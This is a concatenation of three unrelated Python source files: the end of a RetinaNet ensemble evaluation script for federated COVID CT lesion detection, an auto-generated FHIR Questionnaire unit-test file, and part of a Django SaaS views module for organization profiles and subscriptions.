parser = argparse.ArgumentParser(description='Evaluation script for a RetinaNet network.') # subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type') # subparsers.required = True # csv_parser = subparsers.add_parser('csv') # csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for evaluation.') # csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.') parser.add_argument('--ensemble', help='Path to RetinaNet model.', default=False, action='store_true') parser.add_argument('--model', help='Path to RetinaNet model.', default=None) parser.add_argument('--weights', help='only load weights.', default=None) parser.add_argument('--nii', help='path to nii files.') parser.add_argument('--convert-model', help='Convert the model to an inference model (ie. the input is a training model).', action='store_true') parser.add_argument('--backbone', help='The backbone of the model.', default='vgg19') parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).') parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0) parser.add_argument('--score-threshold', help='Threshold on score to filter detections with (defaults to 0.05).', default=0.4, type=float) parser.add_argument('--iou-threshold', help='IoU Threshold to count for a positive detection (defaults to 0.5).', default=0.5, type=float) parser.add_argument('--max-detections', help='Max Detections per image (defaults to 100).', default=100, type=int) parser.add_argument('--detection-threshold', help='Threshold used for determining what detections to draw.', default=0.4, type=int) parser.add_argument('--segmentation-threshold', help='Threshold used for filter segmentation map.', default=0.1, type=int) parser.add_argument('--attention-threshold', help='Threshold used for filter attention map.', default=0.8, type=int) parser.add_argument('--save-path', help='Path for saving images with detections (doesn\'t work for COCO).',default=None) parser.add_argument('--get_predicted_bbox', help='Save predicted bbox to csv.', action='store_true') parser.add_argument('--save-result', help='Save result or not.', type=int, default=0) parser.add_argument('--lung-filter', help='Path for lung seg filter images', default=False, action='store_true') parser.add_argument('--draw-colorful', help='draw difficult type of predict with color', default=False, action='store_true') parser.add_argument('--reduce-fp', help='reduce fp, must use after completing first evaluation', default=False, action='store_true') parser.add_argument('--log', help='Path for saving log file', default=None) parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=512) parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=512) parser.add_argument('--config', help='Path to a configuration parameters .ini file (only used with --convert-model).') parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true') parser.add_argument('--dataset_type', help='Path to CSV file containing annotations for evaluation.', default='csv') parser.add_argument('--annotations', help='Path to CSV file containing annotations for evaluation.') parser.add_argument('--classes', help='Path to a CSV file containing class label mapping.', default='mapping.csv') return parser.parse_args(args) def main(args=None): # parse arguments if args is None: args = sys.argv[1:] args = parse_args(args) # make sure keras is the minimum required version check_keras_version() # optionally choose specific GPU if args.gpu: os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu # keras.backend.tensorflow_backend.set_session(get_session()) # make save path if it doesn't exist if args.save_path is not None and not os.path.exists(args.save_path): os.makedirs(args.save_path) # optionally load config parameters if args.config: args.config = read_config_file(args.config) anno_base_dir = '/research/dept8/qdou/data/covid/' args.classes = os.path.join(anno_base_dir, args.classes) # create the generator # print model summary # print(model.summary()) client_name = ['Dataset1', 'Dataset2', 'Dataset3'] data_path = ['private_1/h5_normalize', 'private_2/h5_normalize', 'private_3/h5_normalize'] # data_path = ['private_1/h5_normalize_-1050_800', 'private_2/h5_normalize_-1050_800','private_3/h5_normalize_-1050_800'] # data_path = ['private_4/B/h5_normalize'] private_1 = ['P5_annotations_h5_whole_vol.csv'] private_2 = ['case1_annotations_h5_whole_vol.csv', 'case4_annotations_h5_whole_vol.csv'] private_3 = ['case19_annotations_h5_whole_vol.csv', 'case23_annotations_h5_whole_vol.csv', 'case40_annotations_h5_whole_vol.csv', 'case42_annotations_h5_whole_vol.csv', 'case46_annotations_h5_whole_vol.csv', 'case49_annotations_h5_whole_vol.csv', 'case51_annotations_h5_whole_vol.csv', 'case54_annotations_h5_whole_vol.csv', 'case58_annotations_h5_whole_vol.csv', 'case60_annotations_h5_whole_vol.csv', 'case61_annotations_h5_whole_vol.csv', 'case62_annotations_h5_whole_vol.csv'] private_4 = ['001_annotations_h5_whole_vol.csv', '005_annotations_h5_whole_vol.csv', '006_annotations_h5_whole_vol.csv', '008_annotations_h5_whole_vol.csv', '009_annotations_h5_whole_vol.csv', '010_annotations_h5_whole_vol.csv', '011_annotations_h5_whole_vol.csv', '012_annotations_h5_whole_vol.csv', '013_annotations_h5_whole_vol.csv', '014_annotations_h5_whole_vol.csv'] # test_data_list = ['test_private_1_all.csv', 'test_mos_all.csv'] test_data_list = [private_1, private_2, private_3] assert len(client_name) == len(data_path) == len(test_data_list) # generate patient name based on csv patient_names = {} for i in range(len(client_name)): for j in range(len(test_data_list[i])): if client_name[i] not in patient_names: patient_names[client_name[i]] = [] patient_names[client_name[i]].append(test_data_list[i][j].split('_')[0]) else: patient_names[client_name[i]].append(test_data_list[i][j].split('_')[0]) # start evaluation log_path = args.log if args.log else './evaluate_ensemble_internal_patient_wise_3_June.txt' logfile = open(log_path,'a') # save prediction to npy if args.get_predicted_bbox == 1: logfile.write('*********************************\n') logfile.write('Save prediction of ensemble model to .npy file\n'.format(args.model)) backbone = models.backbone(args.backbone) # optionally load anchor parameters anchor_params = None if args.config and 'anchor_parameters' in args.config: anchor_params = parse_anchor_parameters(args.config) # load model if args.ensemble: model_list = [] # model_path_list = ['/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private1/vgg19_nl_csv_15.h5', model_path_list = ['/research/dept8/qdou/mrjiang/Impriving_retina/federated_results/21_May_siteB_test_fold2/vgg19_nl_csv_15.h5', '/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private2/vgg19_nl_csv_07.h5', '/research/dept8/qdou/mrjiang/Impriving_retina/final_separate_model/private3/vgg19_nl_csv_17.h5'] for model_path in model_path_list: print('Loading {}...'.format(model_path.split('/')[-2]+model_path.split('/')[-1]),flush=True) model = models.load_model(model_path, backbone_name=args.backbone) if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) model_list.append(model) elif args.model is not None: print('Loading model, this may take a second...',flush=True) model = models.load_model(args.model, backbone_name=args.backbone) # optionally convert the model if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) elif args.weights is not None: weights = args.weights print('Creating model and Loading weights, this may take a second...',flush=True) model, training_model, prediction_model = create_models( backbone_retinanet=backbone.retinanet, # note : when mapping.csv only contains lesion,0, generator.num_classes() ==1 num_classes=1, weights=weights, multi_gpu=args.multi_gpu, freeze_backbone=False, config=args.config, model_config={} ) # optionally convert the model if args.convert_model: model = models.convert_model(model, anchor_params=anchor_params) else: raise ValueError("You have to specify a model") # create generator # generators = [] generators = {} for i in range(len(client_name)): for j in range(len(test_data_list[i])): args.annotations = os.path.join(anno_base_dir, data_path[i], test_data_list[i][j]) print('---client {}---'.format(client_name[i])) print('validation csv {}'.format(args.annotations)) generator = create_generator(args) if client_name[i] not in generators: generators[client_name[i]] = [] generators[client_name[i]].append(generator) else: generators[client_name[i]].append(generator) if args.lung_filter: print('do lung filter',flush=True) logfile.write('do lung filter\n') else: print('no lung filter',flush=True) for i in range(len(generators)): print('------client {}-----'.format(client_name[i])) for j in range(len(generators[client_name[i]])): logfile.write('Writing client {} patient {} prediction results to .npy... \n'.format(client_name[i], patient_names[client_name[i]])) print('------patient {}-----'.format(patient_names[client_name[i]][j])) generator = generators[client_name[i]][j] patient_name = patient_names[client_name[i]][j] if args.ensemble: _print_ensemble_detections_to_npy( args, generator, model_list, client_idx=i, client_name=client_name[i], patient_name=patient_name, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path, ) else: raise ValueError("This is ensemble code") logfile.write('Finish writing \n') logfile.write('*********************************') sys.exit(0) # evaluate from npy logfile.write('*********************************\n') logfile.write('*{}*\n'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))) logfile.write('Evaluate ensemble model from .npy\n'.format(args.model)) logfile.write('thresshold:{}\n'.format(args.score_threshold)) for i in range(len(client_name)): print('client {}'.format(client_name[i])) client_tps, client_fps, client_num_annotations, client_num_slices = 0., 0., 0., 0. client_precision, client_recall, client_fp_slice = [], [], [] client_mAP = [] for j in range(len(test_data_list[i])): patient_name = patient_names[client_name[i]][j] average_precisions, old, new, num_annotations, num_slices = evaluate_from_npy( args, client_name=client_name[i], patient_name=patient_name, iou_threshold=args.iou_threshold, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path, ) patient_tp = new[0] patient_fp = new[1] client_recall.append(new[2]) client_precision.append(new[3]) client_fp_slice.append(new[4]) client_tps += patient_tp client_fps += patient_fp client_num_annotations += num_annotations client_num_slices += num_slices if args.draw_colorful: draw_colorful_result(args, client_name=client_name[i], patient_name=patient_name, iou_threshold=args.iou_threshold, score_threshold=args.score_threshold, max_detections=args.max_detections, save_path=args.save_path) # print evaluation total_instances = [] precisions = [] for label, (average_precision, num_annotations) in average_precisions.items(): # print(' {:.0f} instances of class'.format(num_annotations), # 'lesion', 'with average precision: {:.4f}'.format(average_precision)) total_instances.append(num_annotations) precisions.append(average_precision) if sum(total_instances) == 0: print('No test instances found.') return if args.weighted_average: print(' mAP: {:.4f}'.format( sum([a * b for a, b in zip(total_instances, precisions)]) / sum(total_instances))) else: print(' mAP: {:.4f}'.format(sum(precisions) / sum(x > 0 for x in total_instances))) mAP = sum(precisions) / sum(x > 0 for x in total_instances) client_mAP.append(mAP) logfile.write('client:{} patient{}\n'.format(client_name[i], patient_name)) logfile.write(' TP:{} FP:{}\n'.format(patient_tp, patient_fp)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(patient_fp / num_slices, patient_tp / num_annotations, patient_tp / (patient_tp + patient_fp))) logfile.write(' mAP:{}\n'.format(mAP)) client_total_recall = client_tps / client_num_annotations client_total_precision = client_tps / (client_tps + client_fps) clint_total_fp_slice = client_fps / client_num_slices client_avg_recall = sum(client_recall) / len(test_data_list[i]) client_avg_precision = sum(client_precision) / len(test_data_list[i]) client_avg_fp_slice = sum(client_fp_slice) / len(test_data_list[i]) avg_mAP = sum(client_mAP) / len(test_data_list[i]) # calc confidence interval client_mean_precision = np.mean(np.asanyarray(client_precision)) client_std_precision = np.std(np.asanyarray(client_precision)) client_se_precision = client_std_precision / np.sqrt(len(test_data_list)) client_p_value_precision = 1.96 * client_se_precision client_mean_recall = np.mean(np.asanyarray(client_recall)) client_p_value_recall = 1.96 * (np.std(np.asanyarray(client_recall)) / np.sqrt(len((test_data_list)))) client_mean_map = np.mean(np.asanyarray(client_mAP)) client_p_value_map = 1.96 * (np.std(np.asanyarray(client_mAP)) / np.sqrt(len((test_data_list)))) print('------{}------'.format(client_name[i])) print(' total:') print(' # TP:{} FP{}'.format(client_tps, client_fps)) print(' # FP/slice:{:.4f} Sensitivity:{:.5f} Precision:{:.5f}'.format(clint_total_fp_slice, client_total_recall, client_total_precision)) print(' average:') print(' # TP:{} FP{}'.format(client_tps, client_fps)) print(' # FP/slice:{:.4f} Sensitivity:{:.5f} Precision:{:.5f}'.format(client_avg_fp_slice, client_avg_recall, client_avg_precision)) print(' # mAP:{:.5f}'.format(avg_mAP)) print(' # Sensitivity:[{:.4f}+-{:.4f}] Precision:[{:.4f}+-{:.4f}] mAP:[{:.4f}+-{:.4f}]'.format( client_mean_recall, client_p_value_recall, client_mean_precision, client_p_value_precision, client_mean_map, client_p_value_map)) logfile.write(' total over client:{}\n'.format(client_name[i])) logfile.write(' TP:{} FP:{}\n'.format(client_tps, client_fps)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(clint_total_fp_slice, client_total_recall, client_total_precision)) logfile.write(' Average over client:{}\n'.format(client_name[i])) logfile.write(' TP:{} FP:{}\n'.format(client_tps, client_fps)) logfile.write(' FP/slice:{} Sensitivity:{} Precision:{}\n'.format(client_avg_fp_slice, client_avg_recall, client_avg_precision)) logfile.write(' mAP:{}\n'.format(avg_mAP)) logfile.write('*********************************') logfile.flush() logfile.close() if __name__ == '__main__': main() #!/usr/bin/env python # -*- coding: utf-8 -*- # # Generated from FHIR 1.0.2.7202 on 2016-06-23. # 2016, SMART Health IT. import io import json import os import unittest from . import questionnaire from .fhirdate import FHIRDate class QuestionnaireTests(unittest.TestCase): def instantiate_from(self, filename): datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or '' with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle: js = json.load(handle) self.assertEqual("Questionnaire", js["resourceType"]) return questionnaire.Questionnaire(js) def testQuestionnaire1(self): inst = self.instantiate_from("questionnaire-example-bluebook.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire1(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire1(inst2) def implQuestionnaire1(self, inst): self.assertEqual(inst.date.date, FHIRDate("2013-02-19").date) self.assertEqual(inst.date.as_json(), "2013-02-19") self.assertEqual(inst.group.group[0].group[0].question[0].linkId, "nameOfChild") self.assertEqual(inst.group.group[0].group[0].question[0].text, "Name of child") self.assertEqual(inst.group.group[0].group[0].question[1].linkId, "sex") self.assertEqual(inst.group.group[0].group[0].question[1].text, "Sex") self.assertEqual(inst.group.group[0].group[1].linkId, "neonatalInformation") self.assertEqual(inst.group.group[0].group[1].question[0].linkId, "birthWeight") self.assertEqual(inst.group.group[0].group[1].question[0].text, "Birth weight (kg)") self.assertEqual(inst.group.group[0].group[1].question[1].linkId, "birthLength") self.assertEqual(inst.group.group[0].group[1].question[1].text, "Birth length (cm)") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].extension[0].url, "http://example.org/Profile/questionnaire#visibilityCondition") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].extension[0].valueString, "HAS_VALUE(../choice/code) AND NEQ(../choice/code,'NO')") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].linkId, "vitaminKgivenDoses") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[0].linkId, "vitaminiKDose1") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[0].text, "1st dose") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[1].linkId, "vitaminiKDose2") self.assertEqual(inst.group.group[0].group[1].question[2].group[0].question[1].text, "2nd dose") self.assertEqual(inst.group.group[0].group[1].question[2].linkId, "vitaminKgiven") self.assertEqual(inst.group.group[0].group[1].question[2].text, "Vitamin K given") self.assertEqual(inst.group.group[0].group[1].question[3].group[0].question[0].linkId, "hepBgivenDate") self.assertEqual(inst.group.group[0].group[1].question[3].group[0].question[0].text, "Date given") self.assertEqual(inst.group.group[0].group[1].question[3].linkId, "hepBgiven") self.assertEqual(inst.group.group[0].group[1].question[3].text, "Hep B given y / n") self.assertEqual(inst.group.group[0].group[1].question[4].linkId, "abnormalitiesAtBirth") self.assertEqual(inst.group.group[0].group[1].question[4].text, "Abnormalities noted at birth") self.assertEqual(inst.group.group[0].group[1].title, "Neonatal Information") self.assertEqual(inst.group.group[0].linkId, "birthDetails") self.assertEqual(inst.group.group[0].title, "Birth details - To be completed by health professional") self.assertEqual(inst.group.linkId, "PHR") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "NSW Government My Personal Health Record") self.assertEqual(inst.id, "bb") self.assertEqual(inst.publisher, "New South Wales Department of Health") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") def testQuestionnaire2(self): inst = self.instantiate_from("questionnaire-example-f201-lifelines.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire2(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire2(inst2) def implQuestionnaire2(self, inst): self.assertEqual(inst.date.date, FHIRDate("2010").date) self.assertEqual(inst.date.as_json(), "2010") self.assertEqual(inst.group.concept[0].code, "VL 1-1, 18-65_1.2.2") self.assertEqual(inst.group.concept[0].display, "Lifelines Questionnaire 1 part 1") self.assertEqual(inst.group.concept[0].system, "http://example.org/system/code/lifelines/nl") self.assertEqual(inst.group.group[0].linkId, "1") self.assertEqual(inst.group.group[0].question[0].linkId, "1.1") self.assertEqual(inst.group.group[0].question[0].text, "Do you have allergies?") self.assertEqual(inst.group.group[1].linkId, "2") self.assertEqual(inst.group.group[1].question[0].linkId, "2.1") self.assertEqual(inst.group.group[1].question[0].text, "What is your gender?") self.assertEqual(inst.group.group[1].question[1].linkId, "2.2") self.assertEqual(inst.group.group[1].question[1].text, "What is your date of birth?") self.assertEqual(inst.group.group[1].question[2].linkId, "2.3") self.assertEqual(inst.group.group[1].question[2].text, "What is your country of birth?") self.assertEqual(inst.group.group[1].question[3].linkId, "2.4") self.assertEqual(inst.group.group[1].question[3].text, "What is your marital status?") self.assertEqual(inst.group.group[1].text, "General questions") self.assertEqual(inst.group.group[2].linkId, "3") self.assertEqual(inst.group.group[2].question[0].linkId, "3.1") self.assertEqual(inst.group.group[2].question[0].text, "Do you smoke?") self.assertEqual(inst.group.group[2].question[1].linkId, "3.2") self.assertEqual(inst.group.group[2].question[1].text, "Do you drink alchohol?") self.assertEqual(inst.group.group[2].title, "Intoxications") self.assertEqual(inst.group.linkId, "root") self.assertTrue(inst.group.required) self.assertEqual(inst.id, "f201") self.assertEqual(inst.status, "published") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") def testQuestionnaire3(self): inst = self.instantiate_from("questionnaire-example-gcs.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire3(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire3(inst2) def implQuestionnaire3(self, inst): self.assertEqual(inst.contained[0].id, "motor") self.assertEqual(inst.contained[1].id, "verbal") self.assertEqual(inst.contained[2].id, "eye") self.assertEqual(inst.date.date, FHIRDate("2015-08-03").date) self.assertEqual(inst.date.as_json(), "2015-08-03") self.assertEqual(inst.group.concept[0].code, "9269-2") self.assertEqual(inst.group.concept[0].system, "http://loinc.org") self.assertEqual(inst.group.linkId, "1") self.assertEqual(inst.group.question[0].concept[0].code, "9270-0") self.assertEqual(inst.group.question[0].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[0].linkId, "1.1") self.assertEqual(inst.group.question[0].type, "choice") self.assertEqual(inst.group.question[1].concept[0].code, "9268-4") self.assertEqual(inst.group.question[1].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[1].linkId, "1.2") self.assertEqual(inst.group.question[1].type, "choice") self.assertEqual(inst.group.question[2].concept[0].code, "9267-6") self.assertEqual(inst.group.question[2].concept[0].system, "http://loinc.org") self.assertEqual(inst.group.question[2].linkId, "1.3") self.assertEqual(inst.group.question[2].type, "choice") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "Glasgow Coma Score") self.assertEqual(inst.id, "gcs") self.assertEqual(inst.publisher, "FHIR Project team") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") def testQuestionnaire4(self): inst = self.instantiate_from("questionnaire-example.json") self.assertIsNotNone(inst, "Must have instantiated a Questionnaire instance") self.implQuestionnaire4(inst) js = inst.as_json() self.assertEqual("Questionnaire", js["resourceType"]) inst2 = questionnaire.Questionnaire(js) self.implQuestionnaire4(inst2) def implQuestionnaire4(self, inst): self.assertEqual(inst.contained[0].id, "yesno") self.assertEqual(inst.date.date, FHIRDate("2012-01").date) self.assertEqual(inst.date.as_json(), "2012-01") self.assertEqual(inst.group.group[0].concept[0].code, "COMORBIDITY") self.assertEqual(inst.group.group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].linkId, "1.1") self.assertEqual(inst.group.group[0].question[0].concept[0].code, "COMORB") self.assertEqual(inst.group.group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].concept[0].code, "CARDIAL") self.assertEqual(inst.group.group[0].question[0].group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].question[0].group[0].linkId, "1.1.1.1") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].concept[0].code, "COMORBCAR") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].linkId, "1.1.1.1.1") self.assertEqual(inst.group.group[0].question[0].group[0].question[0].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].code, "COMCAR00") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].display, "Angina Pectoris") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].code, "194828000") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].display, "Angina (disorder)") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].concept[1].system, "http://snomed.info/sct") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].linkId, "1.1.1.1.2") self.assertEqual(inst.group.group[0].question[0].group[0].question[1].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].code, "22298006") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].display, "Myocardial infarction (disorder)") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].concept[0].system, "http://snomed.info/sct") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].linkId, "1.1.1.1.3") self.assertEqual(inst.group.group[0].question[0].group[0].question[2].type, "choice") self.assertEqual(inst.group.group[0].question[0].group[1].concept[0].code, "VASCULAR") self.assertEqual(inst.group.group[0].question[0].group[1].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[0].question[0].group[1].linkId, "1.1.1.2") self.assertEqual(inst.group.group[0].question[0].linkId, "1.1.1") self.assertEqual(inst.group.group[0].question[0].type, "choice") self.assertEqual(inst.group.group[1].concept[0].code, "HISTOPATHOLOGY") self.assertEqual(inst.group.group[1].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[1].group[0].concept[0].code, "ABDOMINAL") self.assertEqual(inst.group.group[1].group[0].concept[0].system, "http://example.org/system/code/sections") self.assertEqual(inst.group.group[1].group[0].linkId, "1.2.1") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].code, "STADPT") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].display, "pT category") self.assertEqual(inst.group.group[1].group[0].question[0].concept[0].system, "http://example.org/system/code/questions") self.assertEqual(inst.group.group[1].group[0].question[0].linkId, "1.2.1.2") self.assertEqual(inst.group.group[1].linkId, "1.2") self.assertEqual(inst.group.linkId, "1") self.assertTrue(inst.group.required) self.assertEqual(inst.group.title, "Cancer Quality Forum Questionnaire 2012") self.assertEqual(inst.id, "3141") self.assertEqual(inst.status, "draft") self.assertEqual(inst.subjectType[0], "Patient") self.assertEqual(inst.text.status, "generated") # Copyright (c) 2021, DjaoDjin inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED # TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ Manage Profile information """ import logging from django import http from django.contrib import messages from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import ValidationError from django.db import IntegrityError, transaction from django.views.generic import ( CreateView, DetailView, ListView, TemplateView, UpdateView, ) from . import RedirectFormMixin from .. import settings, signals from ..compat import reverse, NoReverseMatch from ..decorators import _valid_manager from ..forms import OrganizationForm, OrganizationCreateForm, ManagerAndOrganizationForm from ..mixins import OrganizationMixin, ProviderMixin, RoleDescriptionMixin, PlanMixin from ..models import Plan, Subscription, get_broker from ..utils import ( get_organization_model, update_context_urls, update_db_row, validate_redirect_url as validate_redirect_url_base, ) LOGGER = logging.getLogger(__name__) class RoleDetailView(RoleDescriptionMixin, TemplateView): """ List of users with a specific role for an organization. Template: To edit the layout of this page, create a local \ ``saas/profile/roles/role.html`` (`example `__). You should insure the page will call back the :ref:`/api/profile/:organization/roles/:role/ ` API end point to fetch the set of users with the specified role. Template context: - ``role_descr`` Description of the role that defines the permissions of users on an organization - ``organization`` The organization object users have permissions to. - ``request`` The HTTP request object """ template_name = "saas/profile/roles/role.html" def get_template_names(self): candidates = [] role = self.kwargs.get("role", None) if role: candidates = ["saas/profile/roles/%s.html" % role] candidates += super(RoleDetailView, self).get_template_names() return candidates def get_context_data(self, **kwargs): context = super(RoleDetailView, self).get_context_data(**kwargs) role = self.kwargs.get("role", None) context.update({"role_descr": self.role_description}) urls = { "api_candidates": reverse("saas_api_search_users"), "organization": { "api_roles": reverse( "saas_api_roles_by_descr", args=(self.organization, role) ), }, } update_context_urls(context, urls) return context class RoleListView(OrganizationMixin, TemplateView): """ List all ``RoleDescription`` for an organization and the users under each role. """ template_name = "saas/profile/roles/index.html" def get_context_data(self, **kwargs): context = super(RoleListView, self).get_context_data(**kwargs) urls = { "organization": { "api_roles": reverse("saas_api_roles", args=(self.organization,)), "api_role_descriptions": reverse( "saas_api_role_description_list", args=(self.organization,) ), } } update_context_urls(context, urls) return context class SubscriberListView(ProviderMixin, TemplateView): """ List of organizations subscribed to a plan provided by the organization. Template: To edit the layout of this page, create a local \ ``saas/profile/subscribers.html`` (`example `__). This page will typically call back :ref:`/api/metrics/:organization/active/ ` and/or :ref:`/api/metrics/:organization/churned/\ ` to fetch the set of active and/or churned subscribers for a provider plans. Template context: - ``organization`` The provider object - ``request`` The HTTP request object """ template_name = "saas/profile/subscribers.html" def get_context_data(self, **kwargs): context = super(SubscriberListView, self).get_context_data(**kwargs) provider = self.provider tabs = [ { "is_active": True, "slug": "subscribed", "title": "Active", "urls": { "download": reverse( "saas_subscriber_pipeline_download_subscribed", args=(provider,) ) }, }, { "slug": "churned", "title": "Churned", "urls": { "download": reverse( "saas_subscriber_pipeline_download_churned", args=(provider,) ) }, }, ] context.update({"tabs": tabs}) if provider.is_broker: context.update( { "registered": { "urls": { "download": reverse( "saas_subscriber_pipeline_download_registered" ) } } } ) return context class PlanSubscribersListView(PlanMixin, TemplateView): """ GET displays the list of plan subscribers. Template: To edit the layout of this page, create a local \ ``saas/profile/plans/subscribers.html`` (`example `__). """ template_name = "saas/profile/plans/subscribers.html" def get_context_data(self, **kwargs): context = super(PlanSubscribersListView, self).get_context_data(**kwargs) context["urls"]["provider"]["api_plan_subscribers"] = reverse( "saas_api_plan_subscriptions", args=(self.provider, self.plan) ) return context class SubscriptionListView(OrganizationMixin, ListView): """ List of Plans this organization is subscribed to. Template: To edit the layout of this page, create a local \ ``saas/profile/subscriptions.html`` (`example `__). You should insure the page will call back the :ref:`/api/profile/:organization/subscriptions/ ` API end point to fetch the set of subscriptions for the organization. Template context: - ``organization`` The subscriber object - ``request`` The HTTP request object """ model = Subscription paginate_by = 10 template_name = "saas/profile/subscriptions.html" def get_queryset(self): return Subscription.objects.active_for(self.organization) def get_context_data(self, **kwargs): context = super(SubscriptionListView, self).get_context_data(**kwargs) context.update( { "plans": Plan.objects.filter( organization__in=get_organization_model().objects.accessible_by( self.request.user, role_descr=settings.MANAGER ) ) } ) context.update({"subscriptions": context["object_list"]}) return context class OrganizationCreateView(RedirectFormMixin, CreateView): """ This page helps ``User`` create a new ``Organization``. By default, the request user becomes a manager of the newly created entity. ``User`` and ``Organization`` are separate concepts links together by manager and other custom ``RoleDescription`` relationships. The complete ``User``, ``Organization`` and relationship might be exposed right away to the person registering to the site. This is very usual in Enterprise software. On the hand, a site might decide to keep the complexity hidden by enforcing a one-to-one manager relationship between a ``User`` (login) and an ``Organization`` (payment profile). Template: To edit the layout of this page, create a local \ ``saas/profile/new.html`` (`example `__). Template context: - ``request`` The HTTP request object """ model = get_organization_model() organization_model = get_organization_model() form_class = OrganizationCreateForm pattern_name = "saas_organization_cart" template_name = "saas/profile/new.html" implicit_create_on_none = False def create_organization_from_user(self, user): # pylint:disable=no-self-use with transaction.atomic(): organization = self.organization_model.objects.create( slug=user.get_username(), full_name=user.get_full_name(), email=user.email, ) organization.add_manager(user) return organization def get_implicit_create_on_none(self): return self.implicit_create_on_none def form_valid(self, form): with transaction.atomic(): self.object = form.save() if not _valid_manager(self.request, [get_broker()]): # If it is a manager of the broker platform creating # the newly created Organization will be accessible anyway. self.object.add_manager(self.request.user) return http.HttpResponseRedirect(self.get_success_url()) def get_initial(self): kwargs = super(OrganizationCreateView, self).get_initial() kwargs.update( { "slug": self.request.user.get_username(), "full_name": 